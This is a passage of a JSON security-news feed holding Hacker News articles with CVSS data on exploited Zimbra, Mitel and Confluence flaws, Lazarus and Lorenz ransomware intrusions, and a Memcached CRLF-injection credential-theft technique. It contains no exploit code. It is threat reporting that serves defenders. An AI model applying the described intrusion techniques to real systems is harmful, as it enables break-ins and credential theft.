"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-12T06:14:20", "id": "THN:76E9C775EE4ECFF3F3F1E02BCA0BE2F2", "href": "https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T08:12:43", "description": "[![](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEisdMxSKKuA8oFcW5VApTuLA1_8qiv7WX85vjSnbXrcAc0EYjyxMAq6sl0EFXsgEjtDNIvFeNjVR-BNMd49_sz7_yTIwL4oRVpaYD9mIytX_B4fheBaZrpcevoiSWZrLQy6vtPece3x2HNCMNCqCHmhCmWo1FLFIqKojSzrFhInuEwvu2_dA8KnURVj/s728-e365/ms.jpg>)\n\nA new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.\n\nThat's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident **No Pineapple** in reference to an error message that's used in one of the backdoors.\n\nTargets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain.\n\nRoughly 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022.\n\n\"The threat actor gained access to the network by exploiting a vulnerable Zimbra mail server at the end of August,\" WithSecure said in a [detailed technical report](<https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector>) shared with The Hacker News.\n\nThe security flaws used for initial access are [CVE-2022-27925 and CVE-2022-37042](<https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html>), both of which could be abused to gain remote code execution on the underlying server.\n\nThis step was succeeded by the installation of web shells and the exploitation of local privilege escalation vulnerability in the Zimbra server (i.e., [Pwnkit](<https://thehackernews.com/2022/06/cisa-warns-of-active-exploitation-of.html>) aka CVE-2021-4034), thereby enabling the threat actor to harvest sensitive mailbox data.\n\nSubsequently, in October 2022, the adversary is said to have carried out lateral movement, reconnaissance, and ultimately deployed backdoors such as Dtrack and an updated version of GREASE.\n\n[GREASE](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>), which has been attributed as the handiwork of another North Korea-affiliated threat cluster called [Kimsuky](<https://thehackernews.com/2022/07/north-korean-hackers-using-malicious.html>), comes with [capabilities](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>) to create new administrator accounts with remote desktop protocol (RDP) privileges while also skirting firewall rules.\n\nDtrack, on the other hand, has been employed in [cyber assaults](<https://thehackernews.com/2022/11/north-korean-hackers-targeting-europe.html>) aimed at a variety of industry verticals, and also in financially motivated attacks involving the use of [Maui ransomware](<https://thehackernews.com/2022/08/experts-uncover-details-on-maui.html>).\n\n\"At the beginning of November, Cobalt Strike [command-and-control] beacons were detected from an internal server to two threat actor IP addresses,\" researchers Sami Ruohonen and Stephen Robinson pointed out, adding the data exfiltration occurred from November 5, 2022, through November 11, 2022.\n\nAlso used in the intrusion were tools like Plink and 3Proxy to create a proxy on the victim system, echoing [previous findings](<https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html>) from Cisco Talos about Lazarus Group's attacks targeting energy providers.\n\nBesides relying solely on an IP address-based infrastructure without any domain names, a crucial link exposing the campaign's links to North Korea stems from a connection originating from an IP address located in the country (175.45.176[.]27) to the patient zero server.\n\n[North Korea-backed hacking groups](<https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government>) have had a busy 2022, conducting a series of both espionage-driven attacks and [cryptocurrency heists](<https://thehackernews.com/2023/01/fbi-says-north-korean-hackers-behind.html>) that align with the regime's strategic priorities.\n\nMost recently, the BlueNoroff cluster, also known by the names APT38, Copernicium, Stardust Chollima, and TA444, was [connected](<https://thehackernews.com/2023/01/north-korean-hackers-turn-to-credential.html>) to wide-ranging credential harvesting attacks aimed at education, financial, government, and healthcare sectors.\n\n\"North Korea-linked hackers such as those in cybercriminal syndicate Lazarus Group have been by far the most prolific cryptocurrency hackers over the last few years,\" blockchain analytics firm Chainalysis [said](<https://blog.chainalysis.com/reports/2022-biggest-year-ever-for-crypto-hacking/>), calling 2022 the \"biggest year ever for crypto hacking.\"\n\nIn 2022 alone, the threat actors have been accused of being responsible for $1.65 billion worth of cryptocurrency theft, out of which $1.1 billion originated from hacks of DeFi protocols. A total of $3.8 billion was stolen from crypto businesses during the year, up from $3.3 billion in 2021.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T09:45:00", "type": "thn", "title": "North Korean Hackers Exploit Unpatched Zimbra Devices in 'No Pineapple' Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2023-02-03T07:08:18", "id": "THN:542C8086F46B453764514414E6C59C5E", "href": "https://thehackernews.com/2023/02/north-korean-hackers-exploit-unpatched.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:00", "description": "[![Mitel VoIP Systems](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiDPJ-KCPqu4BVMUHJyRuEsKC9Ws9zevg9s4jYY5kHnf0eMU8S8UX-cdQ0WNuv7siJwQVXJLz9zyqkvY55zqjNUEv3cfLHsCuaAro3-5TZm73jMC3vXQMyQWhRd_C9qonYk8XHm6CoqWUC2wRjRO8_5DxD_D8l1i_qF5s8cS5O6M78wB0VI_PbUBL8F/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiDPJ-KCPqu4BVMUHJyRuEsKC9Ws9zevg9s4jYY5kHnf0eMU8S8UX-cdQ0WNuv7siJwQVXJLz9zyqkvY55zqjNUEv3cfLHsCuaAro3-5TZm73jMC3vXQMyQWhRd_C9qonYk8XHm6CoqWUC2wRjRO8_5DxD_D8l1i_qF5s8cS5O6M78wB0VI_PbUBL8F/s728-e100/ransomware.jpg>)\n\nThe operators behind the Lornenz ransomware operation have been observed exploiting a now-patched critical security flaw in Mitel MiVoice Connect to obtain a foothold into target environments for follow-on malicious activities.\n\n\"Initial malicious activity originated from a Mitel appliance sitting on the network perimeter,\" researchers from cybersecurity firm Arctic Wolf [said](<https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/>) in a report published this week.\n\n\"Lorenz exploited [CVE-2022-29499](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used [Chisel](<https://github.com/jpillora/chisel>) as a tunneling tool to pivot into the environment.\"\n\nLorenz, like many other ransomware groups, is known for double extortion by exfiltrating data prior to encrypting systems, with the actor targeting small and medium businesses (SMBs) located in the U.S., and to a lesser extent in China and Mexico, since at least February 2021.\n\nCalling it an \"ever-evolving ransomware,\" Cybereason [noted](<https://www.cybereason.com/blog/research/cybereason-vs.-lorenz-ransomware>) that Lorenz \"is believed to be a rebranding of the '.sZ40' ransomware that was discovered in October 2020.\"\n\nThe weaponization of Mitel VoIP appliances for ransomware attacks mirrors recent findings from CrowdStrike, which [disclosed](<https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html>) details of a ransomware intrusion attempt that leveraged the same tactic to achieve remote code execution against an unnamed target.\n\nMitel VoIP products are also a [lucrative entry point](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>) in light of the fact that there are nearly 20,000 internet-exposed devices online, as [revealed](<https://twitter.com/GossiTheDog/status/1540309810176217088>) by security researcher Kevin Beaumont, rendering them vulnerable to malicious attacks.\n\nIn one Lorenz ransomware attack investigated by Arctic Wolf, the threat actors weaponized the remote code execution flaw to establish a reverse shell and download the Chisel proxy utility.\n\nThis implies that the initial access was either facilitated with the help of an initial access broker ([IAB](<https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html>)) that's in possession of an exploit for CVE-2022-29499 or that the threat actors have the ability to do so themselves. \n\nWhat's also notable is that the Lorenz group waited for almost a month after obtaining initial access to conduct post-exploitation actions, including establishing persistence by means of a web shell, harvesting credentials, network reconnaissance, privilege escalation, and lateral movement.\n\nThe compromise eventually culminated in the exfiltration of data using FileZilla, following which the hosts were encrypted using Microsoft's BitLocker service, underscoring the [continued abuse](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>) of living-off-the-land binaries (LOLBINs) by adversaries.\n\n\"Monitoring just critical assets is not enough for organizations,\" the researchers said, adding \"security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices.\"\n\n\"Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T14:04:00", "type": "thn", "title": "Lorenz Ransomware Exploit Mitel VoIP Systems to Breach Business Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-09-14T14:04:33", "id": "THN:065BFC8E7532E662AE90BB82F405B132", "href": "https://thehackernews.com/2022/09/lorenz-ransomware-exploit-mitel-voip.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T07:00:49", "description": "[![Atlassian Confluence Hard-Coded Credential Bug](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiEecCIZ-XaRJ4zcsuHaTxv40ceAY7a-zwUbCwG5pavcIkynNfkEL5b0bk3LuyI1j93_OpxDVhmeq2JIDgf2F5gePc20N6z3BLfb8ACE-Hs8BRt0o_lGbsdvT1pJhsBkfeBjvP-oakItq7nm9H28Bo9TQREhjN8EA14vZTuUU3vCCGPWgZ9DEstAMmf/s728-e1000/cisa.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiEecCIZ-XaRJ4zcsuHaTxv40ceAY7a-zwUbCwG5pavcIkynNfkEL5b0bk3LuyI1j93_OpxDVhmeq2JIDgf2F5gePc20N6z3BLfb8ACE-Hs8BRt0o_lGbsdvT1pJhsBkfeBjvP-oakItq7nm9H28Bo9TQREhjN8EA14vZTuUU3vCCGPWgZ9DEstAMmf/s728-e100/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/07/29/cisa-adds-one-known-exploited-vulnerability-catalog>) the recently disclosed Atlassian security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nThe vulnerability, tracked as [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), concerns the use of hard-coded credentials when the Questions For Confluence app is enabled in Confluence Server and Data Center instances.\n\n\"A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group,\" CISA [notes](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in its advisory.\n\n[![Atlassian Confluence](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj0HlXLLx13DKw6KdL9aiyLzkfseKk26WHbECW9EuVAK8HemGF60r4yqvMLbBNmg2C7pxYyzORkxlDkvZNDNlX8XiSd69Eafk_2BLHONWx_a48pMVrF_79sQCg0dubLIL_rH6rjdVuD0lmtcPt11KVakdJCUlX6MSu833QUV4IexS8mTDkDoUAvH8HUaA/s728-e1000/cisa.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj0HlXLLx13DKw6KdL9aiyLzkfseKk26WHbECW9EuVAK8HemGF60r4yqvMLbBNmg2C7pxYyzORkxlDkvZNDNlX8XiSd69Eafk_2BLHONWx_a48pMVrF_79sQCg0dubLIL_rH6rjdVuD0lmtcPt11KVakdJCUlX6MSu833QUV4IexS8mTDkDoUAvH8HUaA/s728-e100/cisa.jpg>)\n\nDepending on the page restrictions and the information a company has in Confluence, successful exploitation of the shortcoming could lead to the disclosure of sensitive information.\n\nAlthough the bug was addressed by the Australian software company last week in versions 2.7.38 and 3.0.5, it has since come [under active exploitation](<https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html>), cybersecurity firm Rapid7 disclosed this week.\n\n\"Exploitation efforts at this point do not seem to be very widespread, though we expect that to change,\" Erick Galinkin, principal AI researcher at Rapid7, told The Hacker News.\n\n\"The good news is that the vulnerability is in the Questions for Confluence app and _not_ in Confluence itself, which reduces the attack surface significantly.\"\n\nWith the flaw now added to the catalog, Federal Civilian Executive Branch (FCEB) in the U.S. are mandated to apply patches by August 19, 2022, to reduce their exposure to cyberattacks.\n\n\"At this point, the vulnerability has been public for a relatively short amount of time,\" Galinkin noted. \"Coupled with the absence of meaningful post-exploitation activity, we don't yet have any threat actors attributed to the attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-07-30T03:54:00", "type": "thn", "title": "CISA Warns of Atlassian Confluence Hard-Coded Credential Bug Exploited in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-02T06:42:46", "id": "THN:908A39F901145B6FD175B16E95137ACC", "href": "https://thehackernews.com/2022/07/cisa-warns-of-atlassian-confluence-hard.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-29T03:59:30", "description": "[![Atlassian Confluence](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjkxSAMgSsFZhb4DyOrv7jlV3A4nb55euT83HxRQMejOiw7UHuT9uTYns_ngLd4U6KF7vN-KarRobTWnwkATG6Q2ql1xpYPHfSvB-iJn8pY0T3rfaRpCwyerROalVbwZK4317SC19907zo6BS65jDRzsVx18rjEfxA_oVj6wzdoEkyJJAI4Q1JxsbJl/s728-e1000/Atlassian-Confluence.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjkxSAMgSsFZhb4DyOrv7jlV3A4nb55euT83HxRQMejOiw7UHuT9uTYns_ngLd4U6KF7vN-KarRobTWnwkATG6Q2ql1xpYPHfSvB-iJn8pY0T3rfaRpCwyerROalVbwZK4317SC19907zo6BS65jDRzsVx18rjEfxA_oVj6wzdoEkyJJAI4Q1JxsbJl/s728-e100/Atlassian-Confluence.jpg>)\n\nA week after Atlassian rolled out patches to contain a critical flaw in its Questions For Confluence app for Confluence Server and Confluence Data Center, the shortcoming has now come under active exploitation in the wild.\n\nThe bug in question is [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), which concerns the use of a hard-coded password in the app that could be exploited by a remote, unauthenticated attacker to gain unrestricted access to all pages in Confluence.\n\nThe real-world exploitation follows the release of the hard-coded credentials on Twitter, prompting the Australian software company to prioritize patches to mitigate potential threats targeting the flaw.\n\n\"Unsurprisingly, it didn't take long [...] to observe exploitation once the hard-coded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks,\" Rapid7 security researcher Glenn Thorpe [said](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n\n[![Atlassian Confluence Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgQF8uoUiufKEleM-yHfQ0lN3WghNEStj2b_QKvuWRV2YnIQm1QmcjsY7RPKKQWQgQ1fuvJ67SI7p4fiY6xW052wY4BZC3Wi5JyVU3EL-XCESStOGZLE2kSoL9gGC-Mz_xbNZ5SrfcW22ED9SF4L5pJUBB1xCQn5zYlws4mPxknxGGYChZ9xJ4m625R/s728-e1000/app.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgQF8uoUiufKEleM-yHfQ0lN3WghNEStj2b_QKvuWRV2YnIQm1QmcjsY7RPKKQWQgQ1fuvJ67SI7p4fiY6xW052wY4BZC3Wi5JyVU3EL-XCESStOGZLE2kSoL9gGC-Mz_xbNZ5SrfcW22ED9SF4L5pJUBB1xCQn5zYlws4mPxknxGGYChZ9xJ4m625R/s728-e100/app.jpg>)\n\nIt's worth noting that the bug only exists when the Questions for Confluence app is enabled. That said, uninstalling the Questions for Confluence app does not remediate the flaw, as the created account does not get automatically removed after the app has been uninstalled.\n\nUsers of the affected product are advised to update their on-premise instances to the latest versions (2.7.38 and 3.0.5) as soon as possible, or take steps to disable/delete the account.\n\nThe development also arrives as Palo Alto Networks, in its [2022 Unit 42 Incident Response Report](<https://www.paloaltonetworks.com/unit42/2022-incident-response-report>), found that threat actors are scanning for vulnerable endpoints within 15 minutes of public disclosure of a new security flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-07-29T03:19:00", "type": "thn", "title": "Latest Critical Atlassian Confluence Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T03:22:24", "id": "THN:49CD77302B5D845459BA34357D9C011C", "href": "https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-16T03:57:00", "description": "[![Zimbra Email Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwT-7sjxllHJ33im2ewzJffbf6_amFwUhqE9YNFRn1oAQ_uUG80yrhVww1nwFO03u8FAjo3L5aPpri00LoT5YlIy_nNaHjUA-HdwxkzOkN5gv9pU2AwTSqEFx6X77vbum3g9G807mbjHzdzl0XuPhwLrXr7cJp7nHZLh2neL2jfZ6uBeKjX_S1PG-X/s728-e1000/email.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwT-7sjxllHJ33im2ewzJffbf6_amFwUhqE9YNFRn1oAQ_uUG80yrhVww1nwFO03u8FAjo3L5aPpri00LoT5YlIy_nNaHjUA-HdwxkzOkN5gv9pU2AwTSqEFx6X77vbum3g9G807mbjHzdzl0XuPhwLrXr7cJp7nHZLh2neL2jfZ6uBeKjX_S1PG-X/s728-e100/email.jpg>)\n\nA new high-severity vulnerability has been disclosed in the Zimbra email suite that, if successfully exploited, enables an unauthenticated attacker to steal cleartext passwords of users sans any user interaction.\n\n\"With the consequent access to the victims' mailboxes, attackers can potentially escalate their access to targeted organizations and gain access to various internal services and steal highly sensitive information,\" SonarSource [said](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in a report shared with The Hacker News.\n\nTracked as [CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924>) (CVSS score: 7.5), the issue has been characterized as a case of \"Memcached poisoning with unauthenticated request,\" leading to a scenario where an adversary can inject malicious commands and siphon sensitive information.\n\nThis is made possible by poisoning the [IMAP](<https://en.wikipedia.org/wiki/Internet_Message_Access_Protocol>) route cache entries in the Memcached server that's used to look up Zimbra users and forward their HTTP requests to appropriate backend services. Memcached is an in-memory key-value storage system for use as a high performance cache or session store for external database and API calls \u2014 in this case the lookup service.\n\nGiven that Memcached parses incoming requests line-by-line, the vulnerability permits an attacker to send a specially crafted lookup request to the server containing [CRLF characters](<https://developer.mozilla.org/en-US/docs/Glossary/CRLF>), causing the server to execute unintended commands.\n\nThe flaw exists because \"newline characters (\\r\\n) are not escaped in untrusted user input,\" the researchers explained. \"This code flaw ultimately allows attackers to steal cleartext credentials from users of targeted Zimbra instances.\"\n\nArmed with this capability, the attacker can subsequently corrupt the cache to overwrite an entry such that it forwards all IMAP traffic to an attacker-controlled server, including the targeted user's credentials in cleartext.\n\nThat said, the attack presupposes the adversary already is in possession of the victims' email addresses so as to be able to poison the cache entries and that they use an IMAP client to retrieve email messages from a mail server.\n\n\"Typically, an organization uses a pattern for email addresses for their members, such as e.g., {firstname}.{lastname}@example.com,\" the researchers said. \"A list of email addresses could be obtained from OSINT sources such as LinkedIn.\"\n\nA threat actor, however, can get around these restrictions by exploiting a technique called [response smuggling](<https://capec.mitre.org/data/definitions/273.html>), which entails \"smuggling\" unauthorized HTTP responses that abuse the CRLF injection flaw to forward IMAP traffic to a rogue server, thereby stealing credentials from users without prior knowledge of their email addresses.\n\n\"The idea is that by continuously injecting more responses than there are work items into the shared response streams of Memcached, we can force random Memcached lookups to use injected responses instead of the correct response,\" the researchers explained. \"This works because Zimbra did not validate the key of the Memcached response when consuming it.\"\n\nFollowing responsible disclosure on March 11, 2022, patches to completely plug the security hole were [shipped](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) by Zimbra on May 10, 2022, in versions [8.8.15 P31.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31.1>) and [9.0.0 P24.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1>).\n\nThe findings arrive months after cybersecurity firm Volexity disclosed an espionage campaign dubbed [EmailThief](<https://thehackernews.com/2022/02/hackers-exploited-0-day-vulnerability.html>) that weaponized a zero-day vulnerability in the email platform to target European government and media entities in the wild.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-14T15:13:00", "type": "thn", "title": "New Zimbra Email Vulnerability Could Let Attackers Steal Your Login Credentials", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-06-16T03:13:54", "id": "THN:86F6539B2FD5CE0DEC7585157E18CBEF", "href": "https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-05T05:59:49", "description": "[![Zimbra Email Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg1qlabRCpYo2LYBmDO-ooZ0Z7AjE5tSW7Q1dVrM9HAlJdlkbmeJ4Lp4rW-i7Wocgu7HRskDAcQ_F9N6MJyiZkdMHHeeBHFu5p1rS3SgR63UmIDBsCk6689iMGqrvI6mvRDrZ1ZkrO1LcyTFyI2fYyAgETyq55krF45SM7PwBmMOgipUg8m2FVigkri/s728-e1000/Zimbra.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg1qlabRCpYo2LYBmDO-ooZ0Z7AjE5tSW7Q1dVrM9HAlJdlkbmeJ4Lp4rW-i7Wocgu7HRskDAcQ_F9N6MJyiZkdMHHeeBHFu5p1rS3SgR63UmIDBsCk6689iMGqrvI6mvRDrZ1ZkrO1LcyTFyI2fYyAgETyq55krF45SM7PwBmMOgipUg8m2FVigkri/s728-e100/Zimbra.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed high-severity vulnerability in the Zimbra email suite to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing [evidence of active exploitation](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/04/cisa-adds-one-known-exploited-vulnerability-catalog>).\n\nThe issue in question is [CVE-2022-27924](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) (CVSS score: 7.5), a command injection flaw in the platform that could lead to the execution of arbitrary Memcached commands and theft of sensitive information.\n\n\"Zimbra Collaboration (ZCS) allows an attacker to inject memcached commands into a targeted instance which causes an overwrite of arbitrary cached entries,\" CISA said.\n\nSpecifically, the bug relates to a case of insufficient validation of user input that, if successfully exploited, could enable attackers to steal cleartext credentials from users of targeted Zimbra instances.\n\nThe issue was [disclosed](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) by SonarSource in June, with [patches](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) released by Zimbra on May 10, 2022, in versions 8.8.15 P31.1 and 9.0.0 P24.1.\n\nCISA hasn't shared technical details of the attacks that exploit the vulnerability in the wild and has yet to attribute it to a certain threat actor.\n\nIn the light of active exploitation of the flaw, users are recommended to apply the updates to the software to reduce their exposure to potential cyberattacks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T05:54:00", "type": "thn", "title": "CISA Adds Zimbra Email Vulnerability to its Exploited Vulnerabilities Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": 